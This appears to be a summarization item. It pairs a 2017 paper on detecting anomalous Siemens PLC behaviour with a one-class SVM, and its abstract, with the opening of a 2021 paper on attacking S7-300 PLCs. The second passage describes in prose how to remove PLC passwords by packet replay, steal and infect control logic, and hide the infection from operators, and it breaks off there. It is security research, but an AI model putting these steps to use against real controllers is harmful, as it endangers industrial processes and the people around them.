Keywords Programmable logic controller, forensics, machine learning I. INTRODUCTION An Industrial Control System (ICS) is used to monitor and control industrial and infrastructure processes such as chemical plant and oil refinery operations, electricity generation and distribution, and water management [1]. If any undesirable incident happens to such a system, it may endanger human lives, cause serious damage to our environment, and lead to enormous financial loss. It is important to protect these systems from undesired incidents such as hardware failure, malicious intruders, accidents, natural disasters, and accidental actions by insiders [5]. Traditionally, control systems have been operated as isolated systems with no network connection to the outside world. Threats against these systems were limited to physical damage attacks or data tampering that originated inside the system. Nowadays, such systems are connected to corporate networks and the Internet over TCP/IP and wireless IP to improve performance and effectiveness [2]. As a result, these formerly closed systems have been exposed to various Internet threats and attacks. The Programmable Logic Controller (PLC) is an essential component of ICS. It is a special computer which can be used to construct an automation system, from a very simple one to a rather complicated one. An example of a simple automation system is a lighting control system, which turns lights on automatically when an area becomes occupied and turns them off when the area becomes unoccupied. On the other hand, a group of PLCs can form a complex automation control system such as a power generation system. PLCs in an electricity generation system are responsible for automating numerous tasks that keep the electricity flowing to our homes, offices and factories [3].
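The lighting-control example above can be sketched as a single PLC-style scan cycle; the input/output names here are hypothetical, not from the paper:

```python
def scan_cycle(occupied: bool) -> bool:
    """One scan of a minimal lighting controller: the light output
    follows the occupancy input, turning on when the area becomes
    occupied and off when it becomes unoccupied."""
    light = occupied
    return light

# Simulate a few scans as the area becomes occupied, then empty again.
states = [scan_cycle(s) for s in (False, True, True, False)]
print(states)
```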
Because of the special architecture of PLCs, such as limited memory and proprietary operating systems, it is difficult to apply contemporary tools and techniques for security protection and digital forensics. This paper proposes to adopt a semi-supervised machine learning algorithm, One-class Support Vector Machine (OCSVM), to detect PLC anomalous events. Although OCSVM has previously been applied successfully to anomaly detection problems such as detecting anomalous Windows registry accesses [25], it seems that it has not been used to detect PLC anomalous behavior. Compared to supervised machine learning, semi-supervised machine learning may be a better solution for PLC anomaly detection (see below for more elaboration). In our experiment, we selected a popular PLC, the Siemens Simatic S7-1212C, and set up a common critical PLC application: a simulated traffic light control system. Anomalous operations of the traffic light control system were created in order to prove the effectiveness and accuracy of the methodology. The proposed methodology is an initial step for us to create a generic model to detect anomalous behavior of any PLC and other control programs even with limited domain knowledge of PLC applications. II. PROGRAMMABLE LOGIC CONTROLLER A Programmable Logic Controller (PLC) is a special form of microprocessor-based controller that uses a programmable memory to store instructions and to implement functions such as logic, sequencing, timing, counting and arithmetic in order to control machines and processes (Fig. 1) [4]. When designing and implementing control applications, PLC programming is an important task.

978-1-5386-0683-4/17/$31.00 2017 IEEE. 2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop.

All PLCs have to be
loaded with a user program to control the status of outputs according to the status of inputs (Fig. 1: Programmable Logic Controller). A PLC identifies each input and output by an address. For Siemens PLCs, the inputs and outputs have addresses in terms of byte and bit numbers. For example, I0.7 is an input at bit 7 of byte 0 and Q0.7 is an output at bit 7 of byte 0. A PLC generates anomalous operations in the following situations [15]: (i) hardware failure; (ii) incompatible firmware version; (iii) control program bugs created by an authorized programmer or attacker; (iv) stop and start attacks; and (v) memory read and write attacks. In order to detect these kinds of anomalous operations, we do the following. We first capture the relevant values of memory addresses used by the PLC control program in a normal situation. The captured values are used to train a model of the normal behavior of the PLC using semi-supervised machine learning. The trained model can then be used to classify whether PLC events are normal operations or not. To demonstrate our proposed methodology, we developed a control program with STEP 7 (the Siemens programming software for S7 PLC programming, communication and configuration) for controlling a traffic light control system (Fig. 2). A. Traffic Light Control System The setup of the simulated traffic light control system used in our experiment is shown in Fig. 2. PLC inputs I0.0 and I0.1 were connected to switches. PLC outputs Q0.0, Q0.1, Q0.5, Q0.6, and Q0.7 were connected to lights. The traffic light control program (TLIGHT) was taken from the user guide SIEMENS SIMATIC S7-300 Programmable Controller Quick Start [6]. The control system is constructed from a set of instructions comprising inputs, outputs, a memory bit, and timers. The instruction details are listed in Table I [6].
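The byte/bit addressing scheme can be made concrete with a small helper (a hypothetical parser, not part of the authors' tooling):

```python
def parse_s7_address(addr: str):
    """Split a Siemens-style I/O address such as 'I0.7' or 'Q0.7' into
    (area, byte, bit): 'I' marks an input, 'Q' an output, 'M' a memory bit."""
    area = addr[0].upper()
    if area not in ("I", "Q", "M"):
        raise ValueError(f"unknown area prefix in {addr!r}")
    byte_part, bit_part = addr[1:].split(".")
    return area, int(byte_part), int(bit_part)

# I0.7 is input bit 7 in byte 0; Q0.1 is output bit 1 in byte 0.
print(parse_s7_address("I0.7"))
print(parse_s7_address("Q0.1"))
```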
III. CHALLENGES OF PLC PROTECTION AND FORENSICS Traditional tools and techniques are not easy to apply directly to PLCs for security protection and forensic investigation because of their unique architectures, such as special operating systems and limited memory [9]. For example, no software can be installed on a PLC to prevent and detect malicious software. The following are PLC forensic challenges [8]:
- Lack of documentation: insufficient low-level documentation is available for PLCs, with serious implications for forensic investigations.
- Lack of domain-specific knowledge and experience: there is no comprehensive body of knowledge for performing PLC forensics.
- Lack of security mechanisms: no logging systems exist for security and forensic purposes.
- Lack of forensic tools: there are no dedicated forensic tools for PLCs to perform a comprehensive investigation.
- Availability / Always-On: the availability of a PLC in an ICS environment is always the top priority. Therefore, it is not easy to shut down a PLC for forensic investigation.
IV. MACHINE LEARNING Machine learning is a method of data analysis. It builds an automated analytical model by using algorithms to learn from data iteratively. Based on the model, machine learning allows computers to find hidden insights without being explicitly programmed [10]. Supervised learning trains a model on known input and output data so that it can predict future outputs. Unsupervised learning finds hidden patterns or intrinsic structures in input data without knowing the corresponding label of each input [11]. Semi-supervised learning falls between unsupervised learning (without any labeled training data) and supervised learning (with completely labeled training data) [7]. One-class Support Vector Machine (OCSVM) is a semi-supervised algorithm.
A. One-class Support Vector Machine (OCSVM) In machine learning, OCSVM is a one-class classification technique, also known as unary classification, which tries to identify objects of a specific class amongst all objects by learning from a training set containing only objects of that class [13] (Fig. 3). This paper utilizes OCSVM to train a model using data from normal situations (the training set) and to classify PLC anomalous behavior that deviates from the trained model. This approach is suitable for PLC anomalous behavior detection because OCSVM deals well with large amounts of training data, since class labelling is not necessary. Also, it is relatively easy to gather training data of normal situations. On the other hand, it is relatively difficult or impossible to collect data of a faulty system state. Even if faulty system states could be simulated, there is no guarantee that all faulty states would be covered [12]. Fig. 2. PLC Inputs / Outputs connection with traffic lights

TABLE I. INSTRUCTIONS OF TRAFFIC LIGHT CONTROL SYSTEM
Outputs:                Q0.0  Red for pedestrians
                        Q0.1  Green for pedestrians
                        Q0.5  Red for vehicles
                        Q0.6  Yellow for vehicles
                        Q0.7  Green for vehicles
Inputs:                 I0.0  Switch on right-hand side of street
                        I0.1  Switch on left-hand side of street
Memory Bit:             M0.0  Memory bit for switching the signal after a green request from a pedestrian
Timers (on-delay):      T2    Duration (3 sec) of yellow phase for vehicles
                        T3    Duration (10 sec) of green phase for pedestrians
                        T4    Delay (6 sec) of red phase for vehicles
                        T5    Duration (3 sec) of red/yellow phase for vehicles
                        T6    Delay (1 sec) before next green request for pedestrians

Fig. 3. One-class Classification
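A minimal sketch of one-class training and prediction with scikit-learn's OneClassSVM follows; the synthetic data stands in for the PLC snapshots, and the RBF kernel and parameters here are illustrative, not the paper's final settings:

```python
import numpy as np
from sklearn.svm import OneClassSVM

rng = np.random.default_rng(42)
# Training set: "normal" samples only -- no class labels are needed.
X_train = 0.3 * rng.standard_normal((200, 2))

clf = OneClassSVM(kernel="rbf", nu=0.1, gamma=0.1).fit(X_train)

# predict() returns +1 for points judged normal and -1 for outliers.
X_test = np.array([[0.1, -0.2],   # near the training cloud
                   [4.0, 4.0]])   # far away: should be flagged anomalous
print(clf.predict(X_test))
```

With nu=0.1, roughly 10% of even the normal training points may fall outside the learned boundary, which matches the training-set accuracy behavior reported later in Table III.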
V. LITERATURE REVIEW There have been many research works focusing on ICS and PLC security protection and forensics since the STUXNET malware attack was discovered in 2010. STUXNET's target was to infect the Siemens programming device (i.e., a PC running Step 7 in a Windows environment). The objective of the malware was to reprogram the ICS by modifying code on the PLCs to make them work in a manner the attacker intended, and to hide those changes from the operator of the equipment [17]. An example is the research work of Jamie et al. [22], who present a new methodology for the development of a transparent expert system for the detection of wind turbine pitch faults utilizing a data-intensive machine learning approach. The expert system for the classification and detection of wind turbine pitch faults was validated by the 85.50% classification accuracy achieved. Tina Wu and Jason Nurse have shown that a PLC attacker's intentions can be determined by monitoring the memory addresses of the user control program [16]. They identified the memory addresses used from the program code, and then monitored and recorded the values of the addresses with PLC Logger as a file (capturing normal PLC behavior). Based on this clean file, they can determine whether the PLC is running normally or being attacked. Ken Yau and KP Chow have proposed two solutions for performing PLC forensics. The first solution was a Control Program Logic Change Detector (CPLCD) [14]. It works with a set of Detection Rules (DRs) to detect and record undesired incidents that interfere with the normal operations of a PLC. The DRs were defined based on the PLC user control program. The CPLCD program works with the defined DRs to monitor memory variables of the control program to detect the PLC Control Program Change Attack and the PLC Memory Read and Write Logic Attack. Their second solution was to capture the values of relevant memory addresses used by the PLC control program as a data log file.
Based on the log file, supervised machine learning was applied to identify anomalous PLC operations [15]. All the solutions mentioned above are able to detect malicious behavior of a specific PLC, and some solutions use supervised machine learning. However, they are not generic solutions. An investigator must fully understand the PLC control program logic before applying these solutions to determine anomalous PLC behavior. Since each PLC is installed with a different control program for a different application, and some programs are extremely complicated, it is not easy for investigators to apply the above solutions to real PLC control systems. Furthermore, it takes time to label a large set of training data when using supervised machine learning. VI. EXPERIMENTAL SETUP AND METHODOLOGY This section describes the experimental setup and the proposed methodology for identifying PLC anomalous operations. A. Experimental Setup The experiments used a Siemens S7-1212C PLC loaded with the traffic light control program (TLIGHT) (Section II-A). The values of relevant memory addresses used by TLIGHT were captured in a log file via a program using the libnodave open source library [18]. In particular, the program monitored the PLC memory addresses over the network and recorded the values along with their timestamps. One computer was installed with Snap7 to create anomalous PLC operations by altering some values in address locations. Snap7 is an open source, 32/64 bit, multi-platform Ethernet communication suite for interfacing natively with Siemens S7 PLCs [19]. The overview of the hardware experimental setup is shown in Fig. 4.
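The logging step can be sketched as follows. The decoding helpers are generic; the network calls use the python-snap7 wrapper rather than the libnodave library the authors used, and the IP address, rack and slot are placeholders, so treat the connection details as assumptions:

```python
import datetime

def bits_of(byte_value: int):
    """Decode one I/O byte into its 8 bit values, bit 0 first,
    so bits_of(b)[7] corresponds to e.g. Q0.7."""
    return [(byte_value >> i) & 1 for i in range(8)]

def format_record(timestamp: datetime.datetime, byte_value: int) -> str:
    """One log line: an ISO timestamp followed by the 8 bit values."""
    return timestamp.isoformat() + " " + " ".join(str(b) for b in bits_of(byte_value))

if __name__ == "__main__":
    import snap7  # pip install python-snap7; API details vary by version
    client = snap7.client.Client()
    client.connect("192.168.0.10", 0, 2)  # placeholder IP, rack 0, slot 2
    # Read 1 byte of the process-output image (Q0.0..Q0.7); in
    # python-snap7 1.x the area constant is snap7.types.Areas.PA.
    data = client.read_area(snap7.types.Areas.PA, 0, 0, 1)
    print(format_record(datetime.datetime.now(), data[0]))
```

Polling such a record once per scan cycle yields exactly the kind of timestamped log file the paper trains on.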
Fig. 4. Overview of Hardware Experimental Setup

B. Classifying Anomalous Behavior A machine learning technique typically splits the available dataset into two components: (i) a training set for learning the properties of the data; and (ii) a testing set for evaluating the learned properties. The accuracy of the response prediction was evaluated on the testing set [23]. An overview of PLC anomaly detection using OCSVM is shown in Fig. 5 and the details are as follows: Step 1: Set up a simulated traffic light control system. The setup details are shown in Fig. 2. Step 2: Collect the values of relevant memory addresses used by the PLC program into a log file (Fig. 6). The memory addresses of the traffic light control system are shown in Table I. The captured data in the log file was used for OCSVM model training. Step 3: Normalize the collected values as the training set. To simplify the semi-supervised machine learning process, all non-binary values of memory addresses (e.g., timers) were converted to binary values. Step 4: Train an OCSVM model using the normalized values. To train a learning model, the One-class SVM (sklearn.svm.OneClassSVM) of Scikit-learn is adopted. Scikit-learn is a free machine learning library for the Python programming language [20]. Based on the training set of the captured data, OCSVM was applied to train a model. There are four kernel functions used in OCSVM: Linear, Polynomial, Gaussian, and Sigmoid/Logistic. The kernels are functions used to define a similarity measure between two data points. After comparing the performance of the four kernel functions in our experiments, we found that the Polynomial kernel function provided higher classification accuracy for the simulated traffic light control system. Polynomial kernel: K(x, y) = (gamma * <x, y> + coef0)^degree; the parameter settings are shown in Table II.
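Step 3 can be sketched as a one-line binarization: any non-binary reading (e.g. a running timer value) is collapsed to 1 if non-zero and 0 otherwise. This is a sketch of the idea, not the authors' exact preprocessing:

```python
def normalize_row(values):
    """Collapse a row of raw memory-address readings to 0/1 features."""
    return [1 if v else 0 for v in values]

# A made-up raw snapshot: two lights on, one timer running, one timer idle.
print(normalize_row([1, 0, 1, 250, 0]))
```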
Step 5: Create and collect PLC anomalous events for performance evaluation of the model. One computer was installed with Snap7 to create anomalous PLC operations by altering some values in address locations.

Fig. 5. Overview of PLC Anomaly Detection using OCSVM (Step 1: set up a simulated traffic light control system; Step 2: collect values of relevant memory addresses used by the PLC program; Step 3: normalize the collected values as the training set; Step 4: train an OCSVM model using the normalized values; Step 5: create and collect PLC anomalous events for performance evaluation of the model; Step 6: evaluate the accuracy of the PLC anomaly detection.)

Fig. 6. Data log file

TABLE II. INPUT PARAMETER SETTINGS OF SCIKIT-LEARN ONE-CLASS SVM (OCSVM)
Parameter  Description                                                                 Value
degree     Degree of the polynomial kernel function                                    3
coef0      Independent coefficient in the kernel function                              4
nu         An upper bound on the fraction of training errors and a lower bound on
           the fraction of support vectors; should be in the interval (0, 1].          0.1
gamma      Defines how much influence a single training example has; the larger
           gamma is, the closer other examples must be to be affected.                 0.1

Test sets were created by capturing the values of the PLC memory addresses while performing the simulated attacks. The test sets contained normal and anomalous PLC events. Step 6: Evaluate the accuracy of the PLC anomaly detection. To evaluate the accuracy of the One-class SVM classification, one training set and three test sets were collected from the simulated traffic light control system. The trained model was evaluated with sklearn.metrics [24] and the classification results with five performance metrics are shown in Table III.
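The polynomial kernel with the Table II settings can be checked against scikit-learn's implementation; the two feature vectors below are made-up binary snapshots:

```python
import numpy as np
from sklearn.metrics.pairwise import polynomial_kernel

gamma, coef0, degree = 0.1, 4, 3  # settings from Table II

x = np.array([[1.0, 0.0, 1.0, 1.0]])
y = np.array([[1.0, 1.0, 0.0, 1.0]])

# K(x, y) = (gamma * <x, y> + coef0) ** degree, computed by hand...
manual = (gamma * (x @ y.T).item() + coef0) ** degree
# ...and by scikit-learn's pairwise helper.
lib = polynomial_kernel(x, y, degree=degree, gamma=gamma, coef0=coef0)[0, 0]
print(manual, lib)
```

Here the dot product is 2, so K = (0.1 * 2 + 4)^3 = 4.2^3 = 74.088.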
Brief descriptions of the metrics are as follows: Accuracy: the ratio (tp + tn) / (p + n), where tp is the number of true positives and tn is the number of true negatives; p is the number of real positive cases in the data and n is the number of real negative cases. Precision: the ratio tp / (tp + fp), where fp is the number of false positives. Precision is intuitively the ability of the classifier not to label as positive a sample that is negative. The best value is 1 and the worst value is 0. Recall: the ratio tp / (tp + fn), where fn is the number of false negatives. Recall is intuitively the ability of the classifier to find all the positive samples. The best value is 1 and the worst value is 0. F1: the F1 score can be interpreted as a weighted average of the precision and recall; it reaches its best value at 1 and worst at 0. AUC: the Area Under the Curve (AUC) is a prediction score measured by the area under the ROC curve. An area of 1 represents a perfect test; an area of 0.5 represents a worthless test. VII. DISCUSSION In the experiment, we made the assumption that the training set data collected from the traffic light system reflected normal operations (without any anomalous events). This assumption is not unreasonable, as we can collect data of normal PLC behavior during testing and maintenance. From the experimental results, high accuracy and high AUC of PLC anomalous operation detection were obtained. Since our logging program captures memory addresses of the PLC with timestamps, OCSVM together with the timestamp information can help forensic investigators to carry out investigations efficiently. OCSVM was able to detect the simulated traffic light anomalous behavior in a dataset after the OCSVM model was trained.
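The five metrics can be reproduced with sklearn.metrics on a toy labelling (1 = normal event, 0 = anomalous; the six labels below are made up for illustration):

```python
from sklearn.metrics import (accuracy_score, f1_score, precision_score,
                             recall_score, roc_auc_score)

y_true = [1, 1, 1, 1, 0, 0]   # ground truth: four normal, two anomalous
y_pred = [1, 1, 1, 0, 0, 0]   # classifier misses one normal event (fn = 1)

print("accuracy ", accuracy_score(y_true, y_pred))   # (tp + tn) / (p + n)
print("precision", precision_score(y_true, y_pred))  # tp / (tp + fp)
print("recall   ", recall_score(y_true, y_pred))     # tp / (tp + fn)
print("f1       ", f1_score(y_true, y_pred))         # blends precision and recall
print("auc      ", roc_auc_score(y_true, y_pred))    # area under the ROC curve
```

Note the same pattern as Table III: with no false positives, precision stays at 1 while missed normal events pull accuracy, recall and F1 down together.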
Since each dataset was recorded with timestamps, we know the date and time of the PLC anomalous events. According to the timestamps and the values of memory addresses in the dataset, the scope of an investigation can be narrowed down. For example, if any firmware or user control program was updated, or any attack occurred during a particular period of time, the proposed solution can identify the date and time of the anomalous events. From the experiments, we found that it is important to select a correct kernel function with appropriate parameter values in order to obtain a more accurate result for PLC anomaly detection. In our experiments, we chose the Polynomial kernel function and adjusted the parameter values as in Table II for classifying anomalous operations of the simulated traffic light system. As different control systems have different operational behavior, we believe that the kernel type and parameter values may differ for different kinds of PLC control systems. Compared with supervised machine learning for PLC anomaly detection, OCSVM may be a better solution when the training set is large and complicated, because the training data for OCSVM does not need to be labelled. Class labelling is not an easy task for a large set of data because it is time consuming and usually needs to be performed by control system experts. VIII. CONCLUSION AND FUTURE WORK To overcome the challenges of PLC protection and forensic investigation, this paper proposes to use semi-supervised machine learning, One-class SVM (OCSVM), to detect PLC anomalous behavior based on the captured values of PLC memory addresses.
Our experiment demonstrates that our solution is feasible and practical to apply to the traffic light control system. This paper is an initial step in applying semi-supervised machine learning for PLC anomaly detection. In the future, we will evaluate the feasibility and improve the accuracy of detecting PLC anomalous behavior by applying the semi-supervised algorithm to various PLC applications in ICS. In addition, we will try to create a generic model for PLC anomaly detection even when the PLC control program is not provided. TABLE III. OCSVM CLASSIFICATION RESULTS OF TRAFFIC LIGHT CONTROL SYSTEM REFERENCES [1] Irfan Ahmed, Sebastian Obermeier, Martin Naedele and Golden G. Richard III, SCADA Systems: Challenges for Forensic Investigations, IEEE Computer, Vol. 45, No. 12, pp. 44-51, USA, 2012. [2] T. Spyridopoulos, T. Tryfonas, J. May, Incident analysis & digital forensics in SCADA and industrial control systems, System Safety Conference incorporating the Cyber Security Conference, 8th IET International, 2013. [3] Dillon Beresford, Exploiting Siemens Simatic S7 PLCs, Black Hat USA, 2011. [4] W. Bolton, Programmable Logic Controllers (4th Edition), 2006. [5] Keith Stouffer, Victoria Pillitteri, Suzanne Lightman, Marshall Abrams, Adam Hahn, Guide to Industrial Control Systems (ICS) Security, NIST Special Publication 800-82 Revision 2, U.S. Department of Commerce, 2015. [6] Siemens, SIMATIC S7-300 Programmable Controller Quick Start, Primer, Preface, C79000-G7076-C500-01, Nuremberg, Germany, 1996. [7] Semi-supervised learning (https://en.wikipedia.org/wiki/Semi-supervised_learning), 2017. [8] H. Patzlaff, D 7.1 Preliminary Report on Forensic Analysis for Industrial Systems, CRISALIS Consortium, Symantec, Sophia Antipolis, France, 2013. [9] M. Fabro, Recommended Practice: Creating Cyber Forensics Plans for Control Systems, Department of Homeland Security, Idaho National Laboratory (INL), USA, 2008.
[10] Machine Learning: What it is and why it matters (www.sas.com/it_it/insights/analytics/machine-learning.html), 2017. [11] Machine Learning in MATLAB (www.mathworks.com/help/stats/machine-learning-in-matlab.html), 2017. [12] Introduction to One-class Support Vector Machines (rvlasveld.github.io/blog/2013/07/12/introduction-to-one-class-support-vector-machines/), last accessed on 2 May 2017. [13] One-class classification (en.wikipedia.org/wiki/One-class_classification), 2017. [14] Ken Yau and Kam-Pui Chow, PLC Forensics based on control program logic change detection, Journal of Digital Forensics, Security and Law, Vol. 9(2), 2015. [15] Ken Yau and Kam-Pui Chow, Detecting Anomalous Programmable Logic Controller Events using Machine Learning, (to appear in the proceedings of) The 13th Annual IFIP WG 11.9 International Conference on Digital Forensics, Orlando, FL, February 2017. [16] Tina Wu and Jason R.C. Nurse, Exploring the use of PLC debugging tools for digital forensic investigations on SCADA systems, Journal of Digital Forensics, Security and Law, Vol. 9(2), 2015. [17] Nicolas Falliere, Liam O Murchu, and Eric Chien, W32.Stuxnet Dossier, Version 1.4, Symantec Corporation, 2011. [18] T. Hergenhahn, libnodave (sourceforge.net/projects/libnodave), 2014. [19] D. Nardella, Step 7 Open Source Ethernet Communication Suite, Bari, Italy (snap7.sourceforge.net), 2016. [20] sklearn.svm.OneClassSVM (scikit-learn.org/stable/modules/generated/sklearn.svm.OneClassSVM.html), 2017. [21] Novelty and Outlier Detection (scikit-learn.org/stable/modules/outlier_detection.html#outlier-detection), 2017. [22] Godwin, J.L., Matthews, P.C. and Watson, C., Classification and detection of electrical control system faults through SCADA data analysis, Chemical Engineering Transactions, Volume 33, pp. 985-990, 2013. [23] scikit-learn Project, An Introduction to Machine Learning with scikit-learn (scikit-learn.org/stable/tutorial/basic/tutorial.html), 2016.
[24] sklearn.metrics: Metrics (scikit-learn.org/stable/modules/classes.html#sklearn-metrics-metrics), 2016. [25] Katherine Heller, Krysta Svore, Angelos D. Keromytis, Salvatore Stolfo, One Class Support Vector Machines for Detecting Anomalous Windows Registry Accesses, Columbia University Academic Commons, 2003.

              No. of Rec   Accuracy   Precision   Recall   F1     AUC
Training Set  41580        0.96       1           0.96     0.98   n/a
Test Set 1    5000         0.78       1           0.78     0.88   0.89
Test Set 2    7000         0.75       1           0.75     0.86   0.83
Test Set 3    13130        0.82       1           0.82     0.90   0.88
Summary:
An Industrial Control System (ICS) is used to monitor and control critical infrastructures. Programmable logic controllers (PLCs) are major components of ICS, which are used to form automation systems. It is important to protect PLCs from attacks and undesired incidents. However, it is not easy to apply traditional tools and techniques to PLCs for security protection and forensics because of their unique architectures. The semi-supervised machine learning algorithm One-class Support Vector Machine (OCSVM) has been applied successfully to many anomaly detection problems. This paper proposes a novel methodology to detect anomalous PLC events by using OCSVM. The methodology was applied to a simulated traffic light control system to illustrate its effectiveness and accuracy. Our results show that high accuracy in identifying anomalous PLC operations is obtained, which can help investigators to perform PLC forensics efficiently and effectively.
Summarize:
Index Terms S7-300 PLCs, Injection Attack, Stealthy Attack, Replay Attack, Fake PLC I. INTRODUCTION Programmable logic controllers (PLCs) in industrial control systems (ICSs) are directly connected to physical processes such as production lines, electrical power grids and other critical plants. They are equipped with control logic that defines how to monitor and control the behaviour of the processes. Thus, their safety, durability, and predictable response times are the primary design concerns. PLCs are offered by several vendors such as Siemens, Allen-Bradley, Mitsubishi, Schneider and Modicon. Each vendor has its own proprietary firmware, programming, communication protocols and maintenance software. However, the basic hardware and software architecture is similar, meaning that all PLCs contain variables and logic to control their inputs and outputs. The PLC code is written on an engineering station in the vendor's control logic language. The control logic is then compiled into an executable format and downloaded to the PLC. The operating PLCs are monitored and managed via dedicated machines running Human Machine Interface (HMI) software. Modern networked PLCs and engineering stations communicate over TCP/IP, but the higher-level protocols in use are typically proprietary. Siemens S7 PLCs of the Simatic family [1] are estimated to hold over 30% of the worldwide PLC market [2]. Furthermore, the Simatic line of products includes the Totally Integrated Automation Portal (TIA), which functions as the engineering station. The TIA Portal and PLCs communicate over the S7 network protocol. Unfortunately, the majority of industrial controllers are not designed to be resilient against cyber-attacks. This means that if a PLC is compromised, then the physical process controlled by the PLC is also compromised, which could eventually lead to a disastrous incident. Stuxnet [3] is perhaps the most well-known attack on ICS.
This malware used a Windows PC to target Siemens S7-300 PLCs that are specifically connected to variable frequency drives. It infects the control logic of the PLCs to monitor the frequency of the attached motors, and only launches an attack if the frequency is within a certain normal range (i.e., 807 Hz to 1,210 Hz). Our focus is to investigate the possibility of exploiting Siemens S7-300 PLCs by: first, compromising the security of the PLCs and altering the running control logic program; second, hiding the infected logic from the engineering software at the control center, which can acquire the logic from the PLC remotely and reveal the infection of the control logic. Please note that compromising the ICS network is out of the scope of this work and can be achieved via typical attack vectors in our IT world, such as an infected USB stick or a vulnerable web server. Finding PLCs connected directly to the Internet is an easy task using search engines such as Shodan, Censys, etc. All our attack scenarios are network based and can be successfully launched by any attacker with network access to the target PLC. The rest of the paper is organized as follows. Section II discusses related work, while our experimental setup is presented in Section III. We illustrate our attack scenarios in Section IV, and discuss the results as well as future work in Section V. II. RELATED WORK Since 2010, ICSs, in particular their configuration and monitoring interfaces, have become targets for attackers. Recent examples of cyber-attacks on ICS occurred in Ukraine [4], [5]. These attacks gave the attackers control over electrical distribution and caused wide-spread blackouts.

978-1-7281-5730-6/21/$31.00 2021 IEEE. 2021 22nd IEEE International Conference on Industrial Technology (ICIT), DOI: 10.1109/ICIT46573.2021.9453483.

In 2014, the German federal office for
information security announced a cyber-attack at an unnamed steel mill, where hackers manipulated and disrupted control systems to such a degree that a blast furnace could not be properly shut down, resulting in massive damage [6]. At Black Hat USA 2015, Klick et al. [7] demonstrated injection of malware into the control logic of a Simatic S7-300 PLC without disrupting service. In a follow-on work, Spenneberg et al. [8] presented a PLC worm. The worm spreads internally from one PLC to other target PLCs. During the infection phase the worm scans the network for new targets (PLCs). Both of the previous works [7], [8] could be easily detected by the ICS operator once the current control logic is requested from the target PLCs. A Ladder Logic Bomb, malware written in ladder logic or one of the compatible languages, was introduced in [9]. Such malware is inserted by an attacker into existing control logic on PLCs. However, this scenario requires the attacker to be familiar with the programming languages the PLC is programmed with. A recent work presented a reverse-engineering attack called ICSREF [10], which can automatically generate malicious payloads against the target system and does not require any prior knowledge of the ICS. The authors of [11] demonstrated common-mode failure attacks targeting an industrial system that consists of redundant modules for recovery purposes. These modules are commonly used in nuclear power plant settings. The authors used DLL hijacking to intercept and modify the command-37 packets sent between the engineering station and the PLC, and could cause all the modules to fail. But this attack was also detectable by the ICS operator. A group of researchers in [12] presents a remote attack on the control logic of a PLC. They were able to infect the PLC and to hide the infection from the engineering software at the control center.
They implemented their attack on the Schneider Electric Modicon M221 and its vendor-supplied engineering software (SoMachine-Basic). Another work demonstrated a series of attacks targeting Siemens S7-1200 PLCs [13]. Their investigation involves attacks like session stealing, phantom PLC, cross-connecting controllers, and denial of S7 connections. Our work differs in that we run an attack that is more difficult to detect at the control center, and we use S7-300 PLCs, which are more widely deployed in industrial systems.

III. EXPERIMENTAL SET-UP
In this section, we describe our experimental set-up, starting with the process to be controlled and afterwards presenting the equipment used.

A. The physical process to be controlled
In our experiments, we use the following application example: there are two aquariums filled with water that is pumped from one to the other until a certain level is reached, and then the pumping direction is inverted (see figure 1). The PLC is connected to the engineering station (TIA Portal) via an Ethernet cable, exchanging data over the network to control the water level in each aquarium. The control process in this set-up runs cyclically as follows:

Fig. 1: Example application of our control process

The PLC reads the input signals coming from sensors 1, 2, 3 and 4. The two upper sensors (Num. 1, 3) installed on both aquariums report to the device when the aquariums are full of water, while the two lower sensors (Num. 2, 4) report to the device when the aquariums are empty. Then the PLC powers the pumps on/off depending on the sensor readings received.

B. Hardware Equipment
In our testbed we have the following components: legitimate user, attacker machine, PLC, communication processor, sensors and pumps, which are described in detail in the following:
1. Legitimate User - a device that is connected to the PLC/CP using the TIA Portal software. Here, we use version 15.2 and Windows 7 as the operating system.
2.
Attacker Machine - a device that sneakily connects to the system without appropriate credentials. In our experiments, the attacker uses the operating system Linux Ubuntu 18.04.1 LTS running on a laptop.
3. PLC S7-300 - as mentioned before, we use Siemens products in our experiments, particularly a CPU from the 300 family. The PLC used in this work is an S7 315-2 PN/DP.
4. Four capacitive proximity sensors - in our testbed, these are four sensors from Sick, type CQ35-25NPP-KC1, with a sensing range of 25 mm and DC 4-wire electrical wiring.

Footnotes:
1. https://support.industry.siemens.com/cs/document/109752566/simatic-step-7-and-wincc-v15-trial-download-?dti=0&lc=en-US
2. https://www.microsoft.com/de-de/software-download/windows7
3. https://ubuntu.com/download/desktop
4. https://www.dell.com/support/home/de/de/debsdt1/productsupport/product/latitude-e6510/overview
5. https://support.industry.siemens.com/cs/pd/480032?pdti=td&dl=en&lc=en-WW
6. https://www.sick.com/de/en/proximity-sensors/capacitive-proximitysensors/cq/cq35-25npp-kc1/p/p244267

5. Two pumps - here, two DC-Runner 1.1 from Aqua Medic with transparent pump housing, 0-10 V connection for external control, maximum pumping output 1200 l/h and maximum pumping height 1.5 m.

C. Attacker Model and Attack Surface
With regard to the types of attacks we consider, we assume that the attacker already has access to the network and is capable of sending packets to the target via port number 102 at the S7 315-2 PN/DP CPU. We also assume that the attacker has no TIA Portal software installed, nor any prior knowledge about the actual process controlled by the PLC, how the PLC is connected, which communication protocol the PLC uses, or the logic program running on it.
In this work, the attack surface is a combination of device design and software implementation; more precisely, it is the implementation of the network stack, the PLC-specific protocol and the PLC operating system.

IV. ATTACK DESCRIPTION
As a consequence of the existing and already reported vulnerabilities, an attacker might carry out several attacks targeting industrial settings. Figure 2 shows an overview of the five attack scenarios that we perform in this work, which consist of:
- Compromising the security of PLCs.
- Stealing control logic programs from PLCs.
- Decompiling the stolen bytecode to STL source code.
- Infecting the control logic code.
- Hiding the ongoing injection attack from the ICS operator.
In the following we illustrate in detail all five above-mentioned attack scenarios conducted against our example application given in section III.

A. Compromising the security measures of PLCs
Siemens PLCs are normally password protected to prevent any unauthorized access and tampering with the logic programs running on the devices. Thus, it is not allowed to read from or write to a controller without knowing the 8-character password that the PLC is protected with. To the best of our knowledge, most previous works mentioned two possibilities to bypass the password: either extracting the hash of the password and then pushing it back to the PLC (replay attack) [14], or using a representative list of plain-text-password/encoded-text-password pairs to brute-force each byte offline (brute-force attack) [17]. In this work, we also use a replay attack, but to remove the password that the PLC is set with, without any change in the current configuration of the target PLC. A typical replay attack on the PLC consists of recording a sequence of packets related to a certain request/response sent by the TIA Portal/PLC, and then pushing the captured/crafted packets back to the target at a later time without authorization.
